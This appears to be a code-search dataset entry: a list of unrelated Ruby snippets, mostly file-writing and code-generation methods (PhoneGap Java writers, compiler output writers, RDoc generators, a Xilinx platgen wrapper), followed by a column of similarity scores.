"def generate\n\t\t dir = \"./experiments/\" + @arguments.first\n\t\t\tDir.mkdir(dir)\n\t\t\tFile.open(dir + \"/\" + @arguments.first + \".rb\", \"w\") do |req_file|\n\t\t\t req_file.puts \"# ## #{as_human_name @arguments.first} ##\"\n\t\t\t req_file.puts \"# \"+@options.description.split(\"\\n\").join(\"\\n# \")\n\t\t\t req_file.puts\n\t\t\t req_file.puts\n\t\t\t req_file.puts \"# The first contious block of comment will be included in your report.\"\n\t\t\t req_file.puts \"# This includes the reference implementation.\"\n\t\t\t req_file.puts \"# Override any desired files in this directory.\"\n\t\t\t Dir[\"./app/**/*.{rb,o,dll,so,bundle}\"].each do |f|\n\t\t\t next if File.basename(f) == 'extconfig.rb'\n\t\t\t p = File.expand_path(f).split(\"/\") - File.expand_path(\".\").split(\"/\")\n\t\t\t req_file.puts \"require \\\"#{p.join(\"/\").gsub(/\\.(rb|o|dll|so|bundle)$/, \"\")}\\\"\"\n\t\t\t end\n\t\t\t req_file.puts \"\\nclass #{as_class_name @arguments.first} < MyExperiment\\n\\t\\nend\"\n\t\t\tend\n\t\t\tFile.open(dir + \"/config.yaml\", \"w\") do |f|\n\t\t\t f << \"---\\nexperiment:\\n development:\\n compute:\\n\"\n end\n end",
"def output\n super(@file_format => @file_path)\n end",
"def mode=(mode)\n @mode = mode.to_sym\n \n # This is a temporary hack to support backwards compatibility\n # with Merb 1.0.8 until it's updated to use the new Webrat.configure\n # syntax\n if @mode == :merb\n require(\"webrat/merb_session\")\n else\n require(\"webrat/#{mode}\")\n end\n end",
"def writeCompiledXMLFile(tokens, classNames, outFile)\n str = compileClass(tokens, classNames)\n str = tabXMLTags(str)\n xmlFile = File.new(outFile, \"w\")\n\n\n xmlFile.syswrite(str)\nend",
"def write_java\n puts \"Creating java file\"\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name.gsub(' ','') } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n code_dir = File.join(@output_dir, \"src\", @pkg.gsub('.', File::SEPARATOR))\n FileUtils.mkdir_p(code_dir)\n open(File.join(code_dir, \"#{ @name.gsub(' ','') }.java\"),'w') { |f| f.puts j.gsub(' ','') }\n end",
"def to_sonfile(filename, options={}, &block)\n File.open(filename,'w') { |file| file << to_son(options, &block) }\n end",
"def write_obj_file output_path\n File.open(output_path, 'w') do |f|\n @vbuffer.each_triple do |a,b,c|\n f.puts \"v #{a} #{b} #{c}\"\n end\n @vnbuffer.each_triple do |a,b,c|\n f.puts \"vn #{a} #{b} #{c}\"\n end\n @fbuffer.each_triple do |a,b,c|\n f.puts \"f #{a+1}//#{a+1} #{b+1}//#{b+1} #{c+1}//#{c+1}\"\n end\n end\n self\n end",
"def writeCompiledFile(tokens, classNames, outFile)\n resultList = compileClass2(tokens, classNames)\n str = resultList[0]\n classTable = resultList[1]\n methodsTableList = resultList[2]\n vmFile = File.new(outFile, \"w\")\n\n vmFile.syswrite(str)\n\n #will print the symbol tables commented out in the vm file\n str = \"\\n\\n//class symbol table\\n\" + classTable.printTable+\"\\n\\n\"\n for i in 0..methodsTableList.size-1\n str += \"//method's symbol table\\n\" + methodsTableList[i].printTable+\"\\n\\n\"\n end\n\n vmFile.syswrite(str)\nend",
"def genWritables(model, outRoot)\n firstRecord = model.records.values.first\n pyPackage, base, packagePath = DataMetaDom::PojoLexer::assertNamespace(firstRecord.name)\n # Next: replace dots with underscores.The path also adjusted accordingly.\n #\n # Rationale for this, quoting PEP 8:\n #\n # Package and Module Names\n #\n # Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves\n # readability. Python packages should also have short, all-lowercase names, although the use of underscores\n # is discouraged.\n #\n # Short and all-lowercase names, and improving readability if you have complex system and need long package names,\n # is \"discouraged\". Can't do this here, our system is more complicated for strictly religous, \"pythonic\" Python.\n # A tool must be enabling, and in this case, this irrational ruling gets in the way.\n # And dots are a no-no, Python can't find packages with complicated package structures and imports.\n #\n # Hence, we opt for long package names with underscores for distinctiveness and readability:\n pyPackage = pyPackage.gsub('.', '_')\n packagePath = packagePath.gsub('/', '_')\n destDir = File.join(outRoot, packagePath)\n FileUtils.mkdir_p destDir\n wriOut = nil # File.open(File.join(destDir, \"#{writableClassName(base)}.py\"), 'wb')\n serFile = File.join(destDir, 'serial.py')\n FileUtils.rm serFile if File.file?(serFile)\n ioOut = File.open(serFile, 'wb') # one huge serialization file\n ioOut.puts %|# This file is generated by DataMeta DOM. Do not edit manually!\n#package #{pyPackage}\n\nfrom hadoop.io import WritableUtils, InputStream, OutputStream, Text\nfrom ebay_datameta_core.base import DateTime\nfrom decimal import *\nfrom collections import *\nfrom bitarray import bitarray\nfrom ebay_datameta_hadoop.base import *\nfrom model import *\n\n|\n begin\n model.records.values.each { |e|\n _, base, _ = DataMetaDom::PojoLexer::assertNamespace(e.name)\n case\n when e.kind_of?(DataMetaDom::Record)\n genWritable model, wriOut, ioOut, e, pyPackage, base\n else\n raise \"Unsupported Entity: #{e.inspect}\"\n end\n }\n ensure\n begin\n ioOut.close\n ensure\n #wriOut.close\n end\n end\n end",
"def write_to_file\n file = File.open(@filename_erl,\"a\")\n file.puts @head, @erl, @sig_sub\n file.puts @sub if @@sub_struct_flag\n (file.puts @un_arr.uni_def, @un_arr.uni_func, @un_arr.uni_func_2) if @@union_flag\n (file.puts @un_arr.arr_def, @un_arr.arr_func) if @@dyn_array_flag\n file.close\n File.open(@filename_hrl, \"a\") {|f| f.puts @const, @enum, @hrl}\n end",
"def write_models_to_file\n Printer.new(models, @output_dir).tap do |p|\n p.write\n end\n end",
"def write_module_artifact(filename,content = nil)\n if namespace\n content = indent(content).chomp\n content = \"module #{namespace.capitalize}\\n#{content}\\nend\\n\"\n end\n \n write_artifact(filename,content)\n end",
"def mode=(new_mode)\n LOGGER.mode = new_mode\n end",
"def mode=(new_mode)\n LOGGER.mode = new_mode\n end",
"def write_project_packages\n puts \"Processing project\"\n\n def package_name_from_file(file)\n dirs = File.dirname(file).split(\"/\").reverse\n i = dirs.index(\"src\") || dirs.index(\"tests\") || dirs.index(\"model-src\")\n i && dirs[0..i-1].reverse.join(\".\")\n end\n\n project_classes = []\n Find.find(Dir.pwd) do |file|\n if File.expand_path(file) == File.expand_path(\"project\")\n Find.prune\n elsif file =~ /.*\\.scala$/ then\n IO.readlines(file).each do |line|\n if line =~ /\\s*(class|trait|object)\\s*(\\w+)\\s*(private)?\\s*(((extends)|(with))\\s+\\w+\\s*)*(\\{|\\[|\\(|$)/ then\n if package_name_from_file(file) then \n project_classes << [$2, package_name_from_file(file)]\n end\n end\n end\n end\n end\n\n File.open($project_packages_file, \"w\") do |f|\n project_classes.uniq.each do |x|\n klass, pckg = x\n f.puts(\"#{klass}\\t#{pckg}\")\n end\n end\nend",
"def configure(mode, compiler, path)\n # @config controls the compilation of a C Program\n @config = {\n # Use which compiler to compile the program\n generator: compiler,\n # Store the binary file to where\n path: path\n }\n\n # @mode can be :default, :quiet, :verbose, :help, :compile_only\n @mode = mode\n end",
"def write_files(cases, laws)\n File.write(@prefix+\"redlatam_cases.json\", JSON.pretty_generate(cases))\n File.write(@prefix+\"redlatam_laws.json\", JSON.pretty_generate(laws))\n File.write(@prefix+\"redlatam_cases.csv\", gen_csv(@prefix+\"redlatam_cases.json\", @case_h))\n File.write(@prefix+\"redlatam_laws.csv\", gen_csv(@prefix+\"redlatam_laws.json\", @law_h))\n end",
"def to_code\n\t\tprefix = [ \n\t\t\t\"#!/usr/bin/ruby\", \n\t\t\t\"system( \\\"#{self.to_scaffold}\\\")\", \n\t\t\t\"Dir.chdir \\\"#{self.name}\\\"\" \n\t\t]\n\n\t\tself.klasses.reduce( prefix) { |m,klass| \n\t\t\tm << \"system( \\\"#{klass.to_scaffold}\\\")\" << klass_to_file(klass)\n\t\t} << \"rake db:create\" << \"rake db:migrate\"\n\tend",
"def file_mode\n super | 0o111\n end",
"def write(filename_or_type=:can, out_options={})\n if filename_or_type.is_a?(Symbol)\n write_string(filename_or_type, out_options)\n else\n write_file(filename_or_type, out_options)\n end\n end",
"def outfile\n return name + ProjectType::filename_suffix(type)\n end",
"def create_model_files\n template 'model.rb', File.join('app/models/mokio', class_path, \"#{file_name}.rb\")\n end",
"def genFileContent(cls, bld)\n\n # Add in any dependencies required by functions\n for fun in cls.functions\n if fun.elementId == CodeElem::ELEM_FUNCTION\n if fun.isTemplate\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\n if templ != nil\n templ.process_dependencies(cls, bld, fun)\n else\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\n end\n end\n end\n end\n\n Utils.instance.genUses(cls.uses, bld)\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.startBlock(\"namespace \" << cls.namespace.get(\".\"))\n end\n\n classDec = cls.model.visibility + \" interface \" + Utils.instance.getStyledClassName(cls.name)\n\n for par in (0..cls.baseClassModelManager.size)\n if par == 0 && cls.baseClasses[par] != nil\n classDec << \" : \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n elsif cls.baseClasses[par] != nil\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n end\n end\n\n bld.startClass(classDec)\n\n bld.endClass\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.endBlock(\" // namespace \" + cls.namespace.get(\".\"))\n bld.add\n end\n end",
"def auto_output(mode = nil)\n mode.nil? ? @state.toggle_auto_output : @state.auto_output = mode\n end",
"def genFileContent(cls, bld)\n bld.separate\n\n for inc in cls.includes\n bld.add(\"require '\" << inc.path << inc.name << \".\" << Utils.instance.getExtension(\"body\"))\n end\n\n bld.separate\n\n render_namespace_starts(cls, bld)\n\n inheritFrom = \"\"\n\n if cls.baseClasses.length > 0\n inheritFrom = \" < \" + Utils.instance.getClassTypeName(cls.baseClasses[0])\n end\n\n if cls.baseClasses.length > 1\n Log.error(\"Ruby doesn't support multiple inheritance\")\n end\n\n bld.startClass(\"class \" + getClassName(cls) + inheritFrom)\n\n accessors = Accessors.new\n # Do automatic static array size declairations at top of class\n process_var_accessors(accessors, cls, bld, cls.model.varGroup)\n\n add_accessors(\"attr_accessor\", accessors.both, bld)\n add_accessors(\"attr_attr_reader\", accessors.readers, bld)\n add_accessors(\"attr_attr_writer\", accessors.writers, bld)\n\n bld.separate\n\n # Do automatic static array size declairations at top of class\n process_var_group(cls, bld, cls.model.varGroup)\n\n bld.separate\n # Generate code for functions\n for fun in cls.functions\n process_function(cls, bld, fun)\n end\n\n bld.endClass\n render_namespace_ends(cls, bld)\n end",
"def generate_options(filename, code); end",
"def generate_options(filename, code); end",
"def mode=(a_mode)\n @@mode = a_mode.to_sym\n end",
"def write(output = T.unsafe(nil), indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write(output = T.unsafe(nil), indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write_file(*args)\n end",
"def output_ext\n end",
"def write(output, indent); end",
"def mode=(val)\n if val.blank? or val.kind_of? Fixnum then\n write_attribute(:mode, val)\n else\n write_attribute(:mode, Mode[val])\n end\n end",
"def write(output, indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def write(output, indent = T.unsafe(nil), transitive = T.unsafe(nil), ie_hack = T.unsafe(nil)); end",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def get_module_definition_file\n check_and_create_directory\n file_name = \"#{@output_dir}/#{@profile_name.downcase}/#{@module_definition_file_name}\"\n File.new(file_name, 'w')\n end",
"def generate_file_files( options, files, classes )\n\t\tdebug_msg \"Generating file documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'filepage.rhtml'\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tfiles.sort_by {|k,v| k }.each do |path, fileinfo|\n\t\t\toutfile = @outputdir + fileinfo[:outfile]\n\t\t\tdebug_msg \" working on %s (%s)\" % [ path, outfile ]\n\t\t\trel_prefix = @outputdir.relative_path_from( outfile.dirname )\n\t\t\tcontext = binding()\n\n\t\t\tdebug_msg \" rendering #{outfile}\"\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def generate_class_files( options, files, classes )\n\t\tdebug_msg \"Generating class documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'classpage.rhtml'\n\t\toutputdir = @outputdir\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tclasses.sort_by {|k,v| k }.each do |classname, classinfo|\n\t\t\tdebug_msg \" working on %s (%s)\" % [ classname, classinfo[:outfile] ]\n\t\t\toutfile = outputdir + classinfo[:outfile]\n\t\t\trel_prefix = outputdir.relative_path_from( outfile.dirname )\n\t\t\tsvninfo = self.get_svninfo( classinfo )\n\n\t\t\tdebug_msg \" rendering #{outfile}\"\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def output_file(type)\n if (type == :html)\n \"#{DirMap.public}#{News.public_path}/#{self.filename}.html\"\n else\n \"#{DirMap.public}#{News.public_path}/#{self.filename}.html\"\n end\n end",
"def save_as_ruby(file)\n if File.exist?(file)\n text = File.read(file)\n save_as_ruby_sub!(text, :version, 'VERSION')\n save_as_ruby_sub!(text, :released, 'RELEASED', 'DATE')\n save_as_ruby_sub!(text, :codename, 'CODENAME')\n else\n t = []\n t << %[module #{codename}]\n t << %[ VERSION = \"#{version}\"]\n t << %[ RELEASE = \"#{release}\"]\n t << %[ CODENAME = \"#{codename}\"]\n t << %[end]\n text = t.join(\"\\n\")\n end\n File.open(file, 'w'){ |f| f << text }\n end",
"def generate_class_files( options, files, classes )\n\t\tdebug_msg \"Generating class documentation in #@outputdir\"\n\t\ttemplatefile = @template_dir + 'classpage.rhtml'\n\t\toutputdir = @outputdir\n\n\t\tmodsort = self.get_sorted_module_list( classes )\n\n\t\tclasses.sort_by {|k,v| k }.each do |classname, classinfo|\n\t\t\tdebug_msg \" working on %s (%s)\" % [ classname, classinfo[:outfile] ]\n\t\t\toutfile = outputdir + classinfo[:outfile]\n\t\t\trel_prefix = outputdir.relative_path_from( outfile.dirname )\n\t\t\tsvninfo = self.get_svninfo( classinfo )\n\n\t\t\tself.render_template( templatefile, binding(), outfile )\n\t\tend\n\tend",
"def output_file(type)\n if (type == :html)\n \"#{DirMap.html_views}/snippets/nav-list.html.erb\"\n else\n \"#{DirMap.html_views}/snippets/nav-list.html.erb\"\n end\n end",
"def set_mode(m)\n @mode = m\n end",
"def pop_mode(mode = nil)\n m = super(mode)\n if ModeTag[m] then\n output_indentation\n @logger.debug \"</#{ModeTag[m]}>\\n\"\n @output << \"</#{ModeTag[m]}>\\n\" unless mode == :table and skip_tables?\n end\n end",
"def mode=(mode)\n Nitro.mode = mode.to_sym\n end",
"def modes= m\n m.instance_eval \"def to_s; self.join(','); end\" if m.is_a?(Array) #override to_s\n @modes = m\n end",
"def writer; end",
"def genFileContent(cls, bld)\r\n bld.startClass(\"class \" + getClassName(cls))\r\n\r\n bld.separate\r\n # Generate code for class variables\r\n eachVar(uevParams().wCls(cls).wBld(bld).wSeparate(true).wVarCb(lambda { |var| }))\r\n\r\n bld.separate\r\n # Generate code for functions\r\n render_functions(cls, bld)\r\n\r\n bld.endClass\r\n end",
"def code_gen(destination = nil, syntax)\n code = syntax == :scss ? @tree.to_scss : @tree.to_sass\n return code unless destination\n if destination.is_a?(String)\n open_file(destination, 'w') { |file| file.write(code) }\n else\n destination.write(code)\n end\n end",
"def write_default_files\n templates = load_templates\n File.open('controller.rb', 'w') { |f| f.write(templates[:controller]) }\n File.open('README.md', 'w') { |f| f.write(templates[:readme]) }\n File.open('index.html.erb', 'w') { |f| f.write(templates[:index]) }\n File.open('Gemfile', 'w') { |f| f.write(templates[:gemfile]) }\nend",
"def output_ext(_ext); end",
"def output_ext(_ext); end",
"def mode\n options[:mode]\n end",
"def output_ext(ext); end",
"def mode=(mode)\n @mode = mode ? mode.to_sym : nil\n end",
"def write(output, indent = T.unsafe(nil)); end",
"def write_java\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n dir = \"#{ @path }/src/#{ @pkg.gsub '.', '/' }\";\n cls = \"#{ @name }.java\"\n pth = File.join(dir,cls)\n open(pth,'w') { |f| f.puts j.gsub(' ','') }\n end",
"def write_traits(output_file)\n open(output_file, 'a') { |f|\n f.puts \"=========#{@generation}========\"\n @all_persons.each do |person|\n f.puts \"#{person.get_chromosome.get_sequence}\"\n end\n }\n end",
"def mode=(type)\n @mode = type.to_s\n end",
"def mode(*modes, &block)\n modes.each do |mode|\n @modes[mode] ||= {}\n @modes[mode][:function] = block\n end\n end",
"def write_swift(swift, section)\n filename = \"section-#{section.to_s.rjust(3, '0')}.swift\"\n @contents_sections << %Q{<code source-file-name=\"#{filename}\"/>}\n\n File.write(@output + \"/#{filename}\", swift)\n end",
"def generate name, file\n require 'erb'\n template = File.read(File.join(File.dirname(__FILE__), \"class_template.erb\"))\n erb = ERB.new(template)\n code = erb.result(binding)\n Dir.mkdir(@basedir) unless File.directory?(@basedir)\n file = File.join(@basedir, name + \".rb\")\n File.open(file, \"w+\") do |f|\n f.puts code\n end\n end",
"def catenate( target_file, *source_files )\n\ttrace \"Catenating modules to form %s\" % [ target_file ]\n\tFile.open( target_file, 'w:utf-8' ) do |target|\n\t\tsource_files.each do |source|\n\t\t\ttrace \" #{source}...\"\n\t\t\ttarget.puts( File.read(source, encoding: 'utf-8') )\n\t\tend\n\tend\nend",
"def output(data, classname)\n sanitized = File.join(@output, classname.gsub('::', '/')).downcase\n path = Pathname(sanitized).dirname\n FileUtils.mkdir_p path.to_s unless path.exist?\n\n File.open(\"#{sanitized}.json\", \"w\") do |f|\n f.write(JSON.pretty_generate(data))\n end\n end",
"def mode=(_arg0); end"
] |
[
"0.61586547",
"0.60897255",
"0.56814134",
"0.5643226",
"0.5630379",
"0.5551736",
"0.55042124",
"0.5504173",
"0.5431309",
"0.53551745",
"0.53501123",
"0.534584",
"0.5301392",
"0.5222702",
"0.5208211",
"0.51636547",
"0.51636547",
"0.51636547",
"0.51636547",
"0.5163312",
"0.51422054",
"0.5136278",
"0.51256686",
"0.5091445",
"0.5084237",
"0.5079875",
"0.5060857",
"0.5060857",
"0.5060857",
"0.50295794",
"0.50209576",
"0.49975348",
"0.4993485",
"0.49741283",
"0.4970659",
"0.49550736",
"0.49350762",
"0.49239424",
"0.49211982",
"0.49174708",
"0.49167994",
"0.4916625",
"0.4907093",
"0.49019587",
"0.488748",
"0.48849508",
"0.48849508",
"0.48776552",
"0.48663574",
"0.4857576",
"0.48552376",
"0.4843799",
"0.48422986",
"0.48409843",
"0.48267764",
"0.482181",
"0.48217982",
"0.4819834",
"0.48118502",
"0.48118502",
"0.4811351",
"0.48111376",
"0.48111376",
"0.4804972",
"0.48045075",
"0.4801326",
"0.4794214",
"0.47901195",
"0.47901195",
"0.47884065",
"0.4786469",
"0.4780142",
"0.47779512",
"0.4758776",
"0.47576624",
"0.4754578",
"0.47480986",
"0.47445172",
"0.47334135",
"0.4731863",
"0.47253576",
"0.47250393",
"0.4716566",
"0.47090155",
"0.46985096",
"0.4683884",
"0.4683884",
"0.4679823",
"0.46774676",
"0.46774098",
"0.46743602",
"0.46632925",
"0.46624732",
"0.46564966",
"0.4647387",
"0.46439543",
"0.46412814",
"0.46363848",
"0.4635549",
"0.46330923"
] |
0.62678695
|
0
|
Start the code generation process.
|
def build
  raise ConfigurationError.new("Must specify working directory") unless @working_dir
  raise ConfigurationError.new("Must specify which sources to wrap") unless @parser
  Logger.info "Beginning code generation"
  # Build the node tree from an explicit node if one was given, otherwise from the parsed sources
  @builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)
  @builder.add_includes @options[:includes]
  @builder.build
  @builder.sort
  Logger.info "Code generation complete"
end
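
A hedged driver sketch for build; the Extension class name and the working_dir/sources accessors are assumptions made for illustration, not confirmed API:

# Hypothetical setup; build raises ConfigurationError unless both
# a working directory and sources to wrap have been supplied first.
ext = Extension.new("my_ext")   # assumed owner of build
ext.working_dir = "generated"   # satisfies the @working_dir guard
ext.sources("wrapper.h")        # assumed to populate @parser
ext.build                       # constructs and sorts the builder node tree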
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start_generation\n Nanite.request(\"/nanny/generate\", self.id)\n end",
"def start\n # Set a cleaner process title\n Process.setproctitle(\"generate #{ARGV.join(\" \")}\")\n\n # Parse CLI arguments\n parser.parse!\n\n # Render Apache portal config\n view = View.new(context)\n rendered_template = view.render(template.read)\n output.write(rendered_template)\n rescue\n $stderr.puts \"#{$!.to_s}\"\n $stderr.puts \"Run 'generate --help' to see a full list of available options.\"\n exit(false)\n end",
"def do_generate(in_background = true)\n update_attributes(:generation_start_time => Time.now)\n logs.create(:message => 'Started generate process')\n generation_started!\n \n generate_rails!\n logs.create(:message => 'Generated Rails')\n \n remove_unwanted_files!\n logs.create(:message => 'Removed unwanted files')\n \n scm_object.initialize_repository\n logs.create(:message => \"Initialized #{scm} repository\")\n \n scm_object.install_plugins\n logs.create(:message => \"Installed #{selected_plugins.count} plugins\")\n \n if capify\n system(\"cd ../#{self.underscored_name} && Capify .\")\n logs.create(:message => \"Capified with Capistrano\")\n end\n \n scm_object.track_all_files\n logs.create(:message => \"Tracked all files\")\n \n scm_object.push_to_server\n logs.create(:message => \"Pushed files to server. Generation completed.\")\n \n update_attributes(:generation_stop_time => Time.now)\n logs.create(:message => 'Finished generate process')\n generation_completed!\n end",
"def start_run; end",
"def generate\n require_relative \"resume/ruby_version_checker\"\n RubyVersionChecker.check_ruby_version\n require_relative \"resume/cli/application\"\n CLI::Application.start\n end",
"def start\n unpack_scripts if File.exist?(DEFLATE_SCRIPT_PATH)\n # Load PSDK Scripts\n if File.exist?(index_filename)\n load_script_from_index\n else\n File.open(SCRIPT_INDEX_PATH, 'w') do |file|\n load_vscode_scripts(VSCODE_SCRIPT_PATH, file)\n end\n end\n # Load RMXP Scripts\n load_rmxp_scripts\n # Load Project Scripts\n load_vscode_scripts(PROJECT_SCRIPT_PATH) if index_filename == SCRIPT_INDEX_PATH\n end",
"def process\n self.generate\n end",
"def perform\n begin\n name = \"rbx-ffi-generators-#{@label}\"\n source = File.expand_path name + @platform.source_ext\n target = File.expand_path name + @platform.executable_ext\n\n File.open source, \"wb\" do |f|\n @subject.source f\n end\n\n if preparer = @subject.prepare(source, target)\n handle preparer, :prepare_failed\n else\n target = source\n end\n\n processor = @subject.process target\n return handle(processor, :process_failed)\n ensure\n remove source, target\n end\n end",
"def run\n start = Time.now\n log \"[0/3] Generating build\"\n generate_build\n\n log \"[1/3] Building\"\n filename = build\n\n log \"[2/3] Parsing\"\n\n @config[:parser].parse(filename)\n log \"[3/3] Complete\"\n\n Time.now - start\n end",
"def start\n require 'irbtools'\n end",
"def gen\n with_output_to @fn do\n pp \"require 'spqr/spqr'\"\n pp \"require 'spqr/app'\"\n\n pp \"\"\n\n @scs.each do |sc|\n pp(\"require '#{sc.package.gsub(/[.]/, '/')}/#{sc.name}'\")\n end\n\n \n pp \"\"\n \n pp \"app = SPQR::App.new(:loglevel => :debug)\"\n \n klass_list = @scs.collect do |sc|\n (sc.package.split(\".\").collect{|pkg| pkg.capitalize} << sc.name).join(\"::\")\n end\n \n pp \"app.register #{klass_list.join ','}\"\n \n pp \"\"\n\n pp \"app.main\"\n end\n end",
"def start\n configure\n run\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n loop do\n run\n end\n end",
"def start\n end",
"def start\n end",
"def start\n\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def start\n end",
"def run!\n @application.load_configuration_file_or_read_the_options!(@options)\n case\n when options.include?(:show_heuristics?)\n list_heuristics!\n when options.include?(:generate_file)\n Generator.new(options)\n else\n @application.run_global_commands!\n start_continuous_testing!\n end\n end",
"def to_code\n\t\tprefix = [ \n\t\t\t\"#!/usr/bin/ruby\", \n\t\t\t\"system( \\\"#{self.to_scaffold}\\\")\", \n\t\t\t\"Dir.chdir \\\"#{self.name}\\\"\" \n\t\t]\n\n\t\tself.klasses.reduce( prefix) { |m,klass| \n\t\t\tm << \"system( \\\"#{klass.to_scaffold}\\\")\" << klass_to_file(klass)\n\t\t} << \"rake db:create\" << \"rake db:migrate\"\n\tend",
"def start\r\n @proc.call\r\n end",
"def start()\n\n\t\tend",
"def start\n end",
"def generate\n end",
"def generate\n puts \"current path should be: \" + PATH_SCRIPT + \"/core\"\n result = false\n Dir.chdir(PATH_SCRIPT+\"/core\") do\n result = call_system_command(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n Dir.chdir(PATH_SCRIPT+\"/is\") do\n result = system(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n return result\n end",
"def generate\n setup\n\n write_style_sheet\n generate_index\n generate_class_files\n generate_file_files\n generate_table_of_contents\n @json_index.generate\n @json_index.generate_gzipped\n\n copy_static\n\n rescue => e\n debug_msg \"%s: %s\\n %s\" % [\n e.class.name, e.message, e.backtrace.join(\"\\n \")\n ]\n\n raise\n end",
"def compile\n prep\n client.setup_run_context\n end",
"def generate!\n generator.invoke_all\n end",
"def generate_data!\n start_dir = Dir.pwd\n \n Dir.chdir tool_path\n system \"./generate -pc #{product_factor} -fn #{filename} -fc\"\n ensure\n Dir.chdir start_dir\n end",
"def generate\n end",
"def execute!\n make_web_directory\n generate_universe\n generate_html\n print_success_message\n end",
"def starten\n create_fox_components\n instance_final_activate\n activate\n end",
"def generate\n if @options.dry_run then\n # do nothing\n @generator.generate\n else\n Dir.chdir @options.op_dir do\n unless @options.quiet then\n $stderr.puts \"\\nGenerating #{@generator.class.name.sub(/^.*::/, '')} format into #{Dir.pwd}...\"\n end\n\n @generator.generate\n update_output_dir '.', @start_time, @last_modified\n end\n end\n end",
"def start\n # create output folder (recursively) if it doesn't exist yet, but only if it's actually defined\n unless @options[:output_folder].nil?\n FileUtils.mkpath(@options[:output_folder]) unless File.directory?(@options[:output_folder])\n end\n \n UI.info(\"Guard::Steering has started watching your files with output folder set to '#{@output_folder}' (in case of 'nil' templates will be compiled to the folder where they are)\") unless @options[:quiet]\n\n run_all if @options[:run_at_start]\n end",
"def program\n @compile\n end",
"def start\n build_all_assets \"Building all assets\"\n end",
"def start\n \n\tend",
"def process(code, context)\n compiler = Verneuil::Compiler.new\n program = compiler.compile(code)\n # p program\n Verneuil::Process.new(program, context)\nend",
"def start()\n source_in = File.new(@file, \"r\")\n read_source(source_in)\n\n # Pad with spaces if necessary\n if !@nopad\n pad()\n end\n\n execute()\n end",
"def start\n create('start')\n end",
"def generate; end",
"def generate; end",
"def generate(scripts)\n require 'uncool/app'\n\n app = App.new(options)\n\n output = app.generate(scripts)\n\n $stdout.puts(output)\n end",
"def generator\n printf(\"%-10s %s\\n\",\"generator:\", \"generating.. (*hdls, *bmm, *scr, *prj)\")\n exitcode = 1\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/hdl/*.vhd\")\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/synthesis/*.vhd\")\n File.symlink(\"../pcores\", \"#{TMPDIR}/pcores\") unless File.symlink?(\"#{TMPDIR}/pcores\")\n pipe = IO.popen(\"platgen -od #{TMPDIR}/ -p xc4vfx100ff1152-10 -lang vhdl ../system.mhs\", \"r+\")\n # pipe = IO.popen(\"platgen -p xc4vfx12ff668-10 system.mhs\", \"r+\")\n pipe.each do |line|\n # puts line\n # do not synthesize\n if line =~ /Running XST synthesis/\n exitcode = 0\n Process.kill 'TERM', pipe.pid\n break\n end\n end\n unless exitcode == 0\n p \"# Error with platgen - check platgen.log\"\n exit\n end\n\n # he generated files under $PROJECT/TMPDIR/{hdl,synthesis}\n # copy them to $PROJECT/hdl/ under certain conditions (size differs & or abstence)\n FileUtils.mkdir('hdl') unless File.directory? 'hdl'\n FileUtils.mkdir('synthesis') unless File.directory? 'synthesis'\n FileUtils.mkdir_p(BMM_RESULTSDIR) unless File.directory? BMM_RESULTSDIR # output directory\n\n # move_files_if(\"#{TMPDIR}/hdl/*.vhd\")\n move_files_if(\"#{TMPDIR}/implementation/#{TOPLEVEL}.bmm\", BMM_RESULTSDIR)\n move_files_if(\"#{TMPDIR}/synthesis/*.scr\" )\n move_files_if(\"#{TMPDIR}/synthesis/*.prj\")\n Find.find(\"#{TMPDIR}/hdl\") do |path|\n move_files_if(path) if File.file? path\n end\n\n # move logfiles to scratch\n FileUtils.mkdir_p(GEN_SCRATCHDIR) unless File.directory? GEN_SCRATCHDIR\n 